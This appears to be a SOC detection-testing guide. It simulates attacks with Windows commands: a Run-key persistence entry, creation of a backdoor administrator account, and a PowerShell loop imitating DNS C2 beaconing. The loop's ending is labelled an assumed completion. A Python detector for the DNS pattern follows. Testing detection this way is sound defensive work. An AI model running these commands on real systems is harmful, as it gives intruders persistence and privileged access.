Azure Attack Sample
Attack 1 - Run Registry Key
Attackers add a program to the Run registry key to achieve persistence: the program then runs every time the user logs on. This sample adds a value named "SOC Test" under the current user's Run key.

```cmd
REM Adds a REG_SZ value "SOC Test" under HKCU\...\Run; /F overwrites without prompting
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "SOC Test" /t REG_SZ /F /D "C:\temp\startup.bat"
```
Attack 2 - User Add and Elevate Privilege
Attackers add a new local user and elevate it into the Administrators group. This gives the attacker a separate, privileged account to log on with.

```cmd
REM Create the local user, set its password, then add it to the local Administrators group
net user theusernametoadd /add
net user theusernametoadd ThePassword1!
net localgroup administrators theusernametoadd /add
```
Attack 3 - Large Volume of DNS Queries
The attacker will send a large volume of DNS queries to a command and control (C2) server. The goal is to trigger threshold-based detection on the number of DNS queries either from a single source system or to a single target domain.
```powershell
param(
    [string]$Domain = "microsoft.com",
    [string]$Subdomain = "subdomain",
    [string]$Sub2domain = "sub2domain",
    [string]$Sub3domain = "sub3domain",
    [string]$QueryType = "TXT",
    [int]$C2Interval = 8,
    [int]$C2Jitter = 20,
    [int]$RunTime = 240
)
$RunStart = Get-Date
$RunEnd = $RunStart.AddMinutes($RunTime)
$x2 = 1
$x3 = 1
Do {
    $TimeNow = Get-Date
    # Every iteration: one query for a random label under $Subdomain.$Domain
    Resolve-DnsName -Type $QueryType "$Subdomain.$(Get-Random -Minimum 1 -Maximum 999999).$Domain" -QuickTimeout
    # Every third iteration: an extra query under $Sub2domain
    if ($x2 -eq 3) {
        Resolve-DnsName -Type $QueryType "$Sub2domain.$(Get-Random -Minimum 1 -Maximum 999999).$Domain" -QuickTimeout
        $x2 = 1
    } else {
        $x2 = $x2 + 1
    }
    # Every seventh iteration: an extra query under $Sub3domain
    if ($x3 -eq 7) {
        Resolve-DnsName -Type $QueryType "$Sub3domain.$(Get-Random -Minimum 1 -Maximum 999999).$Domain" -QuickTimeout
        # The original script is cut off after this Resolve-DnsName line; the remainder of the loop
        # below is an assumed completion that mirrors the $x2 counter and closes the Do loop.
        $x3 = 1
    } else {
        $x3 = $x3 + 1
    }
    # Assumed: pause $C2Interval seconds plus random jitter, treating $C2Jitter as a percentage of the interval
    $JitterMs = Get-Random -Minimum 0 -Maximum ([int]($C2Interval * $C2Jitter * 10))
    Start-Sleep -Milliseconds ($C2Interval * 1000 + $JitterMs)
} While ($TimeNow -lt $RunEnd)
```
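The detection side of Attack 3, as an added example that is not part of the original post: a small Python detector that reads DNS query log lines and flags any source host or any registered domain that exceeds a query-count threshold inside a sliding time window. The log format, the sample lines, the window and the thresholds are all constructed for this example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample DNS query log (assumed format: ISO time, source, query type, queried name).
# Host 10.0.0.5 mimics the script above: many TXT lookups of random subdomains under one domain.
SAMPLE_LOG = "\n".join(
    [f"2024-01-01T10:00:{i:02d} src=10.0.0.5 type=TXT name=subdomain.{48213 + i}.microsoft.com"
     for i in range(12)]
    + ["2024-01-01T10:00:30 src=10.0.0.9 type=A name=www.example.com",
       "2024-01-01T10:00:31 src=10.0.0.9 type=A name=mail.example.com"]
)

LINE_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) type=(?P<qtype>\S+) name=(?P<name>\S+)$")


def registered_domain(name: str) -> str:
    """Collapse the random subdomain labels to the last two labels (naive; ignores public-suffix rules)."""
    return ".".join(name.rstrip(".").split(".")[-2:])


def parse(log: str):
    """Yield (timestamp, source, query type, name) for each well-formed line."""
    for line in log.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield datetime.fromisoformat(m["ts"]), m["src"], m["qtype"], m["name"]


def detect(log: str, window=timedelta(minutes=1), per_source=10, per_domain=10):
    """Flag sources and registered domains whose query count reaches the threshold within the window.

    Assumes log lines are in time order (the sliding window drops entries older than `window`)."""
    recent = defaultdict(deque)
    flagged = {"sources": set(), "domains": set()}
    for ts, src, qtype, name in parse(log):
        for kind, key in (("sources", src), ("domains", registered_domain(name))):
            q = recent[(kind, key)]
            q.append(ts)
            while q and ts - q[0] > window:
                q.popleft()
            if len(q) >= (per_source if kind == "sources" else per_domain):
                flagged[kind].add(key)
    return flagged


if __name__ == "__main__":
    print(detect(SAMPLE_LOG))  # flags source 10.0.0.5 and domain microsoft.com
```

Collapsing names to the registered domain is what makes the per-domain count work against the randomised labels the script generates; in production the threshold and the domain allowlist need tuning per environment.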